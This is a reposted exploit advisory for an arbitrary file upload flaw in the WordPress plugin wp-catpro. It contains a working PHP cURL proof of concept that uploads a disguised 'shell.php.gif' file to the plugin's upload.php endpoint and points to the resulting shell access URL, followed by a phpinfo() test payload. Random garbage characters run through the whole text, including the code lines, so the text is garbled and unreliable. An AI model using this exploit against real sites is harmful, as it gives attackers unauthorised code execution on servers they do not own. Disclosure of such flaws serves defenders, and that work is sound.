WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
% ^0 e$ d9 N, J9 k9 p( Q
/ R, Y( y' p& T) Q5 J作者 => Zikou-163 n3 J% D6 m; s* d0 C
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
/ j. i# d9 E2 p3 C8 z& D
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
2 \4 W n6 v5 X7 |7 i& h% d + k$ C( E/ F! @
#=> Exploit
-----------
5 s. o& s0 ?8 u) k& F9 {<?php
+ ]$ g a: C- g5 I- p* ]1 S6 W
5 I- [; q$ v! e% j4 H& f$uploadfile="zik.php.gif";8 _2 i7 Q6 |- u I9 ?0 F
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
: k5 N. ^! f) ~4 Fcurl_setopt($ch, CURLOPT_POST, true);
, D) D' K7 `$ `/ K Ecurl_setopt($ch, CURLOPT_POSTFIELDS,
$ A; h+ |- H. y$ d! |" M# sarray('Filedata'=>"@$uploadfile",( z% D5 {% q K7 ^0 C: I6 n' o2 X
'folder'=>'/wp-content/uploads/catpro/'));* L2 T0 Z, L$ `! ^
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 L, z) ^% S% Q; W. @& O- n$ R/ Y$postResult = curl_exec($ch); F1 }1 q2 l% A7 i& K5 I
curl_close($ch);
/ x: s" q: T1 }* O K* d, d) v f ( u) T7 M: C& g4 ^
print "$postResult";8 W @7 M8 T, p4 O) u
, O8 I5 d$ T7 F5 [; \8 r- zShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
% ?' T# y5 |3 x4 s4 p# q5 O5 n ?>
# ^# [$ ?; E3 p3 R7 U$ }<?php% a2 W+ ?7 _7 S- H- k8 h
// Presumably the body of the test file uploaded by the PoC above: phpinfo()
// is a benign marker that only proves the file is executed as PHP. A real
// incident would carry a different payload, so treat any executable content
// in an image-named upload as hostile rather than looking for this marker.
phpinfo();
5 H# |" l! D( g- V( Y1 T4 x2 Y1 U7 w?> |